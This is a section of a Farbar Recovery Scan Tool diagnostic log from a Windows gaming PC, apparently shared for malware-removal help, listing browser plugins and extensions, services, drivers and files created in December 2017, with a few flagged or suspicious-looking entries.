FF DefaultProfile: y0hfqnbv.default
FF ProfilePath: C:\Users\Sblck\AppData\Roaming\Mozilla\Firefox\Profiles\y0hfqnbv.default [2017-12-28]
FF Extension: (Live HTTP headers) - C:\Users\Sblck\AppData\Roaming\Mozilla\Firefox\Profiles\y0hfqnbv.default\Extensions\{8f8fe09b-0bd3-4470-bc1b-8cad42b8203a} [2017-06-22] [Legacy]
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_25_0_0_148.dll [2017-04-22] ()
FF Plugin: @esn/npbattlelog,version=2.7.1 -> C:\Program Files (x86)\Battlelog Web Plugins\2.7.1\npbattlelogx64.dll [2015-04-30] (EA Digital Illusions CE AB)
FF Plugin: @java.com/DTPlugin,version=11.144.2 -> C:\Program Files\Java\jre1.8.0_144\bin\dtplugin\npDeployJava1.dll [2017-08-14] (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.144.2 -> C:\Program Files\Java\jre1.8.0_144\bin\plugin2\npjp2.dll [2017-08-14] (Oracle Corporation)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.50907.0\npctrl.dll [2017-05-03] ( Microsoft Corporation)
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll [2017-09-20] (Adobe Systems)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_25_0_0_148.dll [2017-04-22] ()
FF Plugin-x32: @esn/npbattlelog,version=2.7.1 -> C:\Program Files (x86)\Battlelog Web Plugins\2.7.1\npbattlelog.dll [2015-04-30] (EA Digital Illusions CE AB)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=2.0.59 -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIIPT.dll [2012-01-06] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2012-01-06] (Intel Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=11.144.2 -> C:\Program Files (x86)\Java\jre1.8.0_144\bin\dtplugin\npDeployJava1.dll [2017-08-14] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.144.2 -> C:\Program Files (x86)\Java\jre1.8.0_144\bin\plugin2\npjp2.dll [2017-08-14] (Oracle Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files (x86)\Microsoft Silverlight\5.1.50907.0\npctrl.dll [2017-05-03] ( Microsoft Corporation)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2017-12-05] (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2017-12-05] (NVIDIA Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.7\npGoogleUpdate3.dll [2017-11-13] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.7\npGoogleUpdate3.dll [2017-11-13] (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.2.6 -> F:\Programs\VLC\npvlc.dll [2017-05-24] (VideoLAN)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2017-11-04] (Adobe Systems Inc.)
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll [2017-09-20] (Adobe Systems)
FF Plugin HKU\S-1-5-21-2661263523-112610016-3866790350-1000: SkypePlugin -> C:\Users\Sblck\AppData\Local\SkypePlugin\7.32.6.278\npGatewayNpapi.dll [2017-04-18] (Skype Technologies S.A.)
FF Plugin HKU\S-1-5-21-2661263523-112610016-3866790350-1000: SkypePlugin64 -> C:\Users\Sblck\AppData\Local\SkypePlugin\7.32.6.278\npGatewayNpapi-x64.dll [2017-04-18] (Skype Technologies S.A.)
 
Chrome: 
=======
CHR HomePage: Default -> hxxp://www.google.pt/
CHR StartupUrls: Default -> "hxxp://www.google.com/"
CHR Profile: C:\Users\Sblck\AppData\Local\Google\Chrome\User Data\Default [2017-12-28]
CHR Extension: (Apresentações) - C:\Users\Sblck\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2017-10-12]
CHR Extension: (Documentos) - C:\Users\Sblck\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2017-10-12]
CHR Extension: (Google Drive) - C:\Users\Sblck\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-09-27]
CHR Extension: (Chamadas do Skype) - C:\Users\Sblck\AppData\Local\Google\Chrome\User Data\Default\Extensions\blakpkgjpemejpbmfiglncklihnhjkij [2017-09-28]
CHR Extension: (YouTube) - C:\Users\Sblck\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-09-27]
CHR Extension: (uBlock Origin) - C:\Users\Sblck\AppData\Local\Google\Chrome\User Data\Default\Extensions\cjpalhdlnbpafiamejdnhcphjbkeiagm [2017-12-20]
CHR Extension: (Tampermonkey) - C:\Users\Sblck\AppData\Local\Google\Chrome\User Data\Default\Extensions\dhdgffkkebhmkfjojejmpbldmpobfkfo [2017-09-14]
CHR Extension: (Adobe Acrobat) - C:\Users\Sblck\AppData\Local\Google\Chrome\User Data\Default\Extensions\efaidnbmnnnibpcajpcglclefindmkaj [2017-03-03]
CHR Extension: (VTchromizer) - C:\Users\Sblck\AppData\Local\Google\Chrome\User Data\Default\Extensions\efbjojhplkelaegfbieplglfidafgoka [2017-01-16]
CHR Extension: (Block site) - C:\Users\Sblck\AppData\Local\Google\Chrome\User Data\Default\Extensions\eiimnmioipafcokbfikbljfdeojpcgbh [2017-12-03]
CHR Extension: (Streamkeys) - C:\Users\Sblck\AppData\Local\Google\Chrome\User Data\Default\Extensions\ekpipjofdicppbepocohdlgenahaneen [2017-12-25]
CHR Extension: (ZenMate VPN - Best Cyber Security & Unblock) - C:\Users\Sblck\AppData\Local\Google\Chrome\User Data\Default\Extensions\fdcgdnkidjaadafnichfpabhfomcebme [2017-11-21]
CHR Extension: (Folhas de cálculo) - C:\Users\Sblck\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2017-10-12]
CHR Extension: (HTTPS Everywhere) - C:\Users\Sblck\AppData\Local\Google\Chrome\User Data\Default\Extensions\gcbommkclmclpchllfjekcdonpmejbdp [2017-12-07]
CHR Extension: (Documentos do Google offline) - C:\Users\Sblck\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-09-27]
CHR Extension: (No Coin - Block miners on the web!) - C:\Users\Sblck\AppData\Local\Google\Chrome\User Data\Default\Extensions\gojamcfopckidlocpkbelmpjcgmbgjcl [2017-12-16]
CHR Extension: (Pagamentos via Chrome Web Store) - C:\Users\Sblck\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-08-22]
CHR Extension: (Enhanced Steam) - C:\Users\Sblck\AppData\Local\Google\Chrome\User Data\Default\Extensions\okadibdjfemgnhjiembecghcbfknbfhg [2017-12-10]
CHR Extension: (Gmail) - C:\Users\Sblck\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2016-09-27]
CHR Extension: (Chrome Media Router) - C:\Users\Sblck\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-12-09]
CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - hxxps://clients2.google.com/service/update2/crx
 
Opera: 
=======
StartMenuInternet: (HKLM) OperaStable - C:\Program Files\Opera\Launcher.exe
 
==================== Services (Whitelisted) ====================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
S3 AdobeUpdateService; C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe [817760 2017-09-20] (Adobe Systems Incorporated)
S4 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [2246256 2017-05-18] (Adobe Systems, Incorporated)
S3 BEService; C:\Program Files (x86)\Common Files\BattlEye\BEService.exe [6998536 2017-12-08] ()
S3 BRSptStub; C:\ProgramData\BitRaider\BRSptStub.exe [363208 2017-12-26] (BitRaider, LLC)
S4 BstHdLogRotatorSvc; C:\Program Files (x86)\BlueStacks\HD-LogRotatorService.exe [369720 2017-09-05] (BlueStack Systems, Inc.)
S4 CG6Service; F:\Program Files\CyberGhost 6\CyberGhost.Service.exe [232528 2017-08-31] (CyberGhost S.A.)
S3 Disc Soft Lite Bus Service; C:\Program Files\DAEMON Tools Lite\DiscSoftBusServiceLite.exe [1468608 2016-10-06] (Disc Soft Ltd)
R2 Ds3Service; C:\Program Files\Nefarius Software Solutions\ScpToolkit\ScpService.exe [394944 2016-04-12] (Scarlet.Crush Productions)
S3 EasyAntiCheat; C:\Windows\SysWOW64\EasyAntiCheat.exe [392976 2017-02-11] (EasyAntiCheat Ltd)
R2 ekrn; C:\Program Files\ESET\ESET NOD32 Antivirus\ekrn.exe [2836296 2016-12-14] (ESET)
S4 HiPatchService; C:\Program Files (x86)\Hi-Rez Studios\HiPatchService.exe [9728 2016-10-10] (Hi-Rez Studios) [File not signed]
R2 jhi_service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe [165144 2012-05-10] (Intel Corporation)
S3 npggsvc; C:\Windows\SysWOW64\GameMon.des [4362656 2016-02-24] (INCA Internet Co., Ltd.) [File not signed]
R2 NVDisplay.ContainerLocalSystem; C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe [463664 2017-12-05] (NVIDIA Corporation)
S4 NvTelemetryContainer; C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe [460736 2017-12-05] (NVIDIA Corporation)
S4 Origin Client Service; F:\Origin\OriginClientService.exe [2134848 2017-12-09] (Electronic Arts)
S2 Origin Web Helper Service; F:\Origin\OriginWebHelperService.exe [3014472 2017-12-09] (Electronic Arts)
R2 PnkBstrA; C:\Windows\SysWOW64\PnkBstrA.exe [76152 2017-09-22] ()
S4 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [10803440 2017-08-29] (TeamViewer GmbH)
S3 TunngleService; C:\Program Files (x86)\Tunngle\TnglCtrl.exe [872432 2016-06-23] (Tunngle.net GmbH)
R2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2016-06-12] (Microsoft Corporation)
S4 XperiaCompanionService; C:\Program Files\Sony\Xperia Companion\Service\XperiaCompanionService.exe [2205568 2017-02-07] (Sony)
 
===================== Drivers (Whitelisted) ======================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R1 AsIO; C:\Windows\SysWow64\drivers\AsIO.sys [15232 2016-04-01] ()
R1 AsUpIO; C:\Windows\SysWow64\drivers\AsUpIO.sys [14464 2010-08-03] ()
S3 BstkDrv; C:\Program Files (x86)\BlueStacks\BstkDrv.sys [270904 2017-06-21] (Bluestack System Inc. )
R3 dtlitescsibus; C:\Windows\System32\DRIVERS\dtlitescsibus.sys [30264 2016-10-25] (Disc Soft Ltd)
R3 dtliteusbbus; C:\Windows\System32\DRIVERS\dtliteusbbus.sys [47672 2016-10-25] (Disc Soft Ltd)
R1 eamonm; C:\Windows\System32\DRIVERS\eamonm.sys [132272 2016-12-05] (ESET)
U5 edevmon; C:\Windows\System32\Drivers\edevmon.sys [106768 2016-12-05] (ESET)
R1 ehdrv; C:\Windows\System32\DRIVERS\ehdrv.sys [180544 2016-12-05] (ESET)
R1 epfwwfpr; C:\Windows\System32\DRIVERS\epfwwfpr.sys [70960 2016-12-05] (ESET)
S3 ggsomc; C:\Windows\System32\DRIVERS\ggsomc.sys [30424 2017-02-16] (Sony Mobile Communications)
R1 HWiNFO32; C:\Windows\SysWOW64\drivers\HWiNFO64A.SYS [27552 2017-01-15] (REALiX™)
S3 IOMap; C:\Windows\system32\drivers\IOMap64.sys [25920 2017-01-26] (ASUSTeK Computer Inc.)
S3 libusbK; C:\Windows\System32\DRIVERS\libusbK.sys [47200 2016-10-07] (hxxp://libusb-win32.sourceforge.net)
S3 MYFAULT; C:\Windows\system32\drivers\myfault.sys [25752 2017-01-17] (Sysinternals)
R3 RTCore64; C:\Program Files (x86)\MSI Afterburner\RTCore64.sys [14024 2017-08-27] ()
R3 ScpVBus; C:\Windows\System32\DRIVERS\ScpVBus.sys [42856 2016-03-27] (Nefarius Software Solutions)
S3 semav6msr64; C:\Windows\system32\drivers\semav6msr64.sys [21984 2015-06-04] ()
R3 tap0901t; C:\Windows\System32\DRIVERS\tap0901t.sys [39464 2016-04-26] (Tunngle.net GmbH)
R3 VCSVADHWSer; C:\Windows\System32\DRIVERS\vcsvad.sys [21504 2008-12-26] (Avnex)
U5 VWiFiFlt; C:\Windows\System32\Drivers\VWiFiFlt.sys [59904 2009-07-14] (Microsoft Corporation)
R1 ZAM; C:\Windows\System32\drivers\zam64.sys [203680 2016-12-30] (Zemana Ltd.)
R1 ZAM_Guard; C:\Windows\System32\drivers\zamguard64.sys [203680 2016-12-30] (Zemana Ltd.)
R3 ALSysIO; \??\C:\Users\Sblck\AppData\Local\Temp\ALSysIO64.sys [X] <==== ATTENTION
S3 BRDriver64_1_3_3_E02B25FC; \??\C:\ProgramData\BitRaider\support\1.3.3\E02B25FC\BRDriver64.sys [X]
S3 GLCKIO; \??\C:\PROGRA~2\COMMON~1\INSTAL~1\Driver\9\INTEL3~1\690b33e1-0462-4e84-9bea-c7552b45432a.sys [X]
S3 PORTMON; \??\C:\Users\Sblck\Desktop\SysinternalsSuite\PORTMSYS.SYS [X]
S3 VBAudioVACAMME; system32\DRIVERS\vbaudio_cablea64_win7.sys [X]
S3 VBAudioVACBMME; system32\DRIVERS\vbaudio_cableb64_win7.sys [X]
S3 VBAudioVMVAIOMME; system32\DRIVERS\vbaudio_vmvaio64_win7.sys [X]
S3 vmci; \SystemRoot\system32\DRIVERS\vmci.sys [X]
S3 VMnetAdapter; system32\DRIVERS\vmnetadapter.sys [X]
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== One Month Created files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2017-12-28 16:02 - 2017-12-28 20:43 - 000000000 ____D C:\FRST
2017-12-28 05:58 - 2017-12-28 05:58 - 000218586 _____ C:\TDSSKiller.3.1.0.15_28.12.2017_05.58.03_log.txt
2017-12-28 04:09 - 2017-12-28 04:09 - 000000000 ____D C:\Windows\SysWOW64\data
2017-12-28 04:09 - 2017-12-28 04:09 - 000000000 ____D C:\Program Files (x86)\Sophos
2017-12-28 03:53 - 2017-12-28 03:53 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsigne5ae3db1246d235a
2017-12-28 03:53 - 2017-12-28 03:53 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsign343e9ec52f7fd552
2017-12-28 03:53 - 2017-12-28 03:53 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsign1efa06de796e8ad3
2017-12-28 02:42 - 2017-12-28 02:42 - 000012872 _____ (SurfRight B.V.) C:\Windows\system32\bootdelete.exe
2017-12-28 02:42 - 2017-12-28 02:42 - 000000174 _____ C:\Windows\system32\bootdelete.lst
2017-12-28 02:33 - 2017-12-28 02:33 - 000000000 ____D C:\ProgramData\Emsisoft
2017-12-28 02:22 - 2017-12-28 02:22 - 000002621 _____ C:\Users\Sblck\AppData\Local\AppVShNotifyt.txt
2017-12-28 02:08 - 2017-12-28 02:22 - 000001757 _____ C:\Users\Sblck\AppData\Local\x
2017-12-28 02:08 - 2017-12-28 02:08 - 000938008 _____ C:\Users\Sblck\AppData\Local\WindowsCodecsRaw.txt
2017-12-28 02:08 - 2017-12-28 02:08 - 000002621 _____ C:\Users\Sblck\AppData\Local\AppVShNotifytvbs.vbs
2017-12-28 02:08 - 2017-12-28 02:08 - 000002584 _____ C:\Users\Sblck\AppData\Local\AppVShNotifytvbs.txt
2017-12-28 02:08 - 2017-12-28 02:08 - 000001760 _____ C:\Users\Sblck\AppData\Local\xx
2017-12-28 02:08 - 2017-12-28 02:08 - 000001684 _____ C:\Users\Sblck\AppData\Local\XXML.txt
2017-12-28 02:08 - 2017-12-28 02:08 - 000001684 _____ C:\Users\Sblck\AppData\Local\XML.txt
2017-12-28 02:08 - 2017-12-28 02:08 - 000000029 _____ C:\Users\Sblck\AppData\Local\MCconfig.dll
2017-12-27 20:44 - 2017-12-27 20:44 - 000000000 ____D C:\Users\Sblck\Documents\Paradox Interactive
2017-12-27 00:23 - 2017-12-27 00:23 - 000000000 ____D C:\Users\Sblck\Documents\Star Wars - The Old Republic
2017-12-26 20:11 - 2017-12-26 20:11 - 000000000 ____D C:\Users\Sblck\Documents\HeroBlade Logs
2017-12-26 20:11 - 2017-12-26 20:11 - 000000000 ____D C:\Users\Sblck\AppData\Local\SWTOR
2017-12-26 18:46 - 2017-12-26 18:46 - 000000000 ____D C:\Users\Sblck\AppData\LocalLow\Unity
2017-12-26 18:46 - 2017-12-26 18:46 - 000000000 ____D C:\Users\Sblck\AppData\LocalLow\Hyper Hippo Productions Ltd_
2017-12-26 17:58 - 2017-12-26 17:58 - 000000000 ____D C:\Users\Public\Documents\BitRaider
2017-12-26 17:58 - 2017-12-26 17:58 - 000000000 ____D C:\ProgramData\Documents\BitRaider
2017-12-26 17:58 - 2017-12-26 17:58 - 000000000 ____D C:\ProgramData\BitRaider
2017-12-26 17:55 - 2017-12-26 17:55 - 000000000 ____D C:\Users\Sblck\AppData\Local\SWTORPerf
2017-12-26 17:54 - 2017-12-26 17:54 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\EA
2017-12-26 16:24 - 2017-12-26 16:24 - 000000000 ____D C:\Users\Sblck\AppData\LocalLow\Graphite Lab
2017-12-24 22:16 - 2017-12-24 22:16 - 000000000 ____D C:\Users\Sblck\Documents\KillHouseGames
2017-12-21 01:14 - 2017-12-21 01:14 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsignd7f7090ca4ac1881
2017-12-21 01:14 - 2017-12-21 01:14 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsign513d5e68afbe06ff
2017-12-21 01:13 - 2017-12-21 01:13 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsignf275cfd24f8abf8f
2017-12-21 01:13 - 2017-12-21 01:13 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsignaa3ebf02045ed3f4
2017-12-21 01:13 - 2017-12-21 01:13 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsign71de186bca50890b
2017-12-21 01:13 - 2017-12-21 01:13 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsign62e729e85932ae9b
2017-12-21 01:13 - 2017-12-21 01:13 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsign36feac13f8ae187b
2017-12-20 23:19 - 2017-12-20 23:19 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsign8eda57a023064a99
2017-12-20 23:16 - 2017-12-20 23:16 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsign14ad0f9f816f04c3
2017-12-20 23:13 - 2017-12-20 23:13 - 000000822 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Media Encoder CC 2018.lnk
2017-12-20 23:10 - 2017-12-20 23:10 - 000000922 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe After Effects CC 2018.lnk
2017-12-20 23:07 - 2017-12-20 23:07 - 000000000 ____D C:\Users\Public\Documents\AdobeInstalledCodecs
2017-12-20 23:07 - 2017-12-20 23:07 - 000000000 ____D C:\ProgramData\Documents\AdobeInstalledCodecs
2017-12-20 17:59 - 2017-12-20 17:59 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsigne30d82309317b6ee
2017-12-20 17:59 - 2017-12-20 17:59 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsigna8e6c9e33f3e5864
2017-12-20 17:32 - 2017-12-20 17:32 - 000001224 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Creative Cloud.lnk
2017-12-20 00:50 - 2017-12-20 00:50 - 000000000 ____D C:\Users\Sblck\AppData\Roaming\NVIDIA
2017-12-16 20:30 - 2017-12-16 20:30 - 000000000 ____D C:\Users\Sblck\AppData\Roaming\Arrowhead
2017-12-14 21:07 - 2017-12-14 21:07 - 000000000 ____D C:\Users\Sblck\AppData\LocalLow\Temp
2017-12-12 19:57 - 2017-12-12 19:57 - 000000000 ____D C:\Users\Sblck\AppData\Roaming\HD Tune Pro
2017-12-12 19:57 - 2017-12-12 19:57 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HD Tune Pro
2017-12-11 20:43 - 2017-12-15 20:01 - 000000000 ____D C:\Users\Sblck\Documents\Planetbase
2017-12-11 20:40 - 2017-12-11 20:40 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\GOG.com
2017-12-11 20:40 - 2017-12-11 20:40 - 000000000 ____D C:\ProgramData\GOG.com
2017-12-11 13:56 - 2017-12-11 13:56 - 000000000 ____D C:\Users\Sblck\AppData\Local\NVIDIA
2017-12-11 13:54 - 2017-12-28 15:31 - 000003022 _____ C:\Windows\System32\Tasks\MSIAfterburner
2017-12-11 13:49 - 2017-12-28 02:38 - 000000000 ____D C:\Program Files (x86)\MSI Afterburner
2017-12-11 13:49 - 2017-12-11 13:49 - 000000000 ____D C:\Users\Sblck\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MSI Afterburner
2017-12-11 13:43 - 2017-12-11 13:43 - 000000000 ____D C:\Program Files (x86)\VulkanRT
2017-12-11 13:43 - 2017-12-05 21:17 - 000001951 _____ C:\Windows\NvTelemetryContainerRecovery.bat
2017-12-11 13:43 - 2017-12-05 19:36 - 000137200 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvStreaming.exe
2017-12-11 13:43 - 2017-09-13 23:20 - 000798008 _____ C:\Windows\SysWOW64\vulkan-1.dll
2017-12-11 13:43 - 2017-09-13 23:20 - 000490296 _____ C:\Windows\SysWOW64\vulkaninfo.exe
2017-12-11 13:43 - 2017-09-13 23:19 - 000927544 _____ C:\Windows\system32\vulkan-1.dll
2017-12-11 13:43 - 2017-09-13 23:19 - 000591160 _____ C:\Windows\system32\vulkaninfo.exe
2017-12-11 13:42 - 2017-12-28 15:32 - 000000000 ____D C:\ProgramData\NVIDIA
2017-12-11 13:42 - 2017-12-11 13:43 - 000000000 ____D C:\Program Files (x86)\NVIDIA Corporation
2017-12-11 13:42 - 2017-12-05 21:17 - 000531856 _____ (Khronos Group) C:\Windows\system32\OpenCL.dll
2017-12-11 13:42 - 2017-12-05 21:17 - 000438768 _____ (Khronos Group) C:\Windows\SysWOW64\OpenCL.dll
2017-12-11 13:42 - 2017-12-05 19:56 - 000001951 _____ C:\Windows\NvContainerRecovery.bat
2017-12-11 13:42 - 2017-12-05 19:32 - 005966696 _____ (NVIDIA Corporation) C:\Windows\system32\nvcpl.dll
2017-12-11 13:42 - 2017-12-05 19:32 - 002589168 _____ (NVIDIA Corporation) C:\Windows\system32\nvsvc64.dll
2017-12-11 13:42 - 2017-12-05 19:32 - 001766288 _____ (NVIDIA Corporation) C:\Windows\system32\nvsvcr.dll
2017-12-11 13:42 - 2017-12-05 19:32 - 000607304 _____ (NVIDIA Corporation) C:\Windows\system32\nv3dappshext.dll
2017-12-11 13:42 - 2017-12-05 19:32 - 000450352 _____ (NVIDIA Corporation) C:\Windows\system32\nvmctray.dll
2017-12-11 13:42 - 2017-12-05 19:32 - 000122768 _____ (NVIDIA Corporation) C:\Windows\system32\nvshext.dll
2017-12-11 13:42 - 2017-12-05 19:32 - 000082744 _____ (NVIDIA Corporation) C:\Windows\system32\nv3dappshextr.dll
2017-12-11 13:42 - 2017-11-25 12:40 - 007874971 _____ C:\Windows\system32\nvcoproc.bin
2017-12-11 13:40 - 2017-12-11 13:43 - 000000000 ____D C:\ProgramData\NVIDIA Corporation
2017-12-11 13:40 - 2017-12-05 21:17 - 040238576 _____ (NVIDIA Corporation) C:\Windows\system32\nvcompiler.dll
2017-12-11 13:40 - 2017-12-05 21:17 - 036301384 _____ (NVIDIA Corporation) C:\Windows\system32\nvoglv64.dll
2017-12-11 13:40 - 2017-12-05 21:17 - 035156368 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvcompiler.dll
2017-12-11 13:40 - 2017-12-05 21:17 - 029345592 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvoglv32.dll
2017-12-11 13:40 - 2017-12-05 21:17 - 023266584 _____ (NVIDIA Corporation) C:\Windows\system32\nvopencl.dll
2017-12-11 13:40 - 2017-12-05 21:17 - 022257256 _____ (NVIDIA Corporation) C:\Windows\system32\nvwgf2umx.dll
2017-12-11 13:40 - 2017-12-05 21:17 - 019526696 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvwgf2um.dll
2017-12-11 13:40 - 2017-12-05 21:17 - 019039792 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvopencl.dll
2017-12-11 13:40 - 2017-12-05 21:17 - 018208784 _____ (NVIDIA Corporation) C:\Windows\system32\nvd3dumx.dll
2017-12-11 13:40 - 2017-12-05 21:17 - 016851768 _____ (NVIDIA Corporation) C:\Windows\system32\Drivers\nvlddmkm.sys
2017-12-11 13:40 - 2017-12-05 21:17 - 015027984 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvd3dum.dll
2017-12-11 13:40 - 2017-12-05 21:17 - 013867656 _____ (NVIDIA Corporation) C:\Windows\system32\nvcuda.dll
2017-12-11 13:40 - 2017-12-05 21:17 - 013255032 _____ (NVIDIA Corporation) C:\Windows\system32\nvptxJitCompiler.dll
2017-12-11 13:40 - 2017-12-05 21:17 - 011782096 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvcuda.dll
2017-12-11 13:40 - 2017-12-05 21:17 - 010883744 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvptxJitCompiler.dll
2017-12-11 13:40 - 2017-12-05 21:17 - 004285704 _____ (NVIDIA Corporation) C:\Windows\system32\nvapi64.dll
2017-12-11 13:40 - 2017-12-05 21:17 - 003808144 _____ (NVIDIA Corporation) C:\Windows\system32\nvcuvid.dll
2017-12-11 13:40 - 2017-12-05 21:17 - 003799032 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvapi.dll
2017-12-11 13:40 - 2017-12-05 21:17 - 003347952 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvcuvid.dll
2017-12-11 13:40 - 2017-12-05 21:17 - 001989944 _____ (NVIDIA Corporation) C:\Windows\system32\nvdispco6438859.dll
2017-12-11 13:40 - 2017-12-05 21:17 - 001674736 _____ (NVIDIA Corporation) C:\Windows\system32\nvdispgenco6438859.dll
2017-12-11 13:40 - 2017-12-05 21:17 - 001615472 _____ (NVIDIA Corporation) C:\Windows\system32\nvhdagenco6420103.dll
2017-12-11 13:40 - 2017-12-05 21:17 - 001135464 _____ (NVIDIA Corporation) C:\Windows\system32\nvfatbinaryLoader.dll
2017-12-11 13:40 - 2017-12-05 21:17 - 001099848 _____ (NVIDIA Corporation) C:\Windows\system32\NvFBC64.dll
2017-12-11 13:40 - 2017-12-05 21:17 - 001031984 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\NvFBC.dll
2017-12-11 13:40 - 2017-12-05 21:17 - 000981816 _____ (NVIDIA Corporation) C:\Windows\system32\NvIFR64.dll
2017-12-11 13:40 - 2017-12-05 21:17 - 000933360 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\NvIFR.dll
2017-12-11 13:40 - 2017-12-05 21:17 - 000885496 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvfatbinaryLoader.dll
2017-12-11 13:40 - 2017-12-05 21:17 - 000616432 _____ (NVIDIA Corporation) C:\Windows\system32\NvIFROpenGL.dll
2017-12-11 13:40 - 2017-12-05 21:17 - 000527288 _____ (NVIDIA Corporation) C:\Windows\system32\nvEncodeAPI64.dll
2017-12-11 13:40 - 2017-12-05 21:17 - 000505928 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\NvIFROpenGL.dll
2017-12-11 13:40 - 2017-12-05 21:17 - 000492232 _____ (NVIDIA Corporation) C:\Windows\system32\nvumdshimx.dll
2017-12-11 13:40 - 2017-12-05 21:17 - 000446216 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvEncodeAPI.dll
2017-12-11 13:40 - 2017-12-05 21:17 - 000407064 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvumdshim.dll
2017-12-11 13:40 - 2017-12-05 21:17 - 000225208 _____ (NVIDIA Corporation) C:\Windows\system32\Drivers\nvhda64v.sys
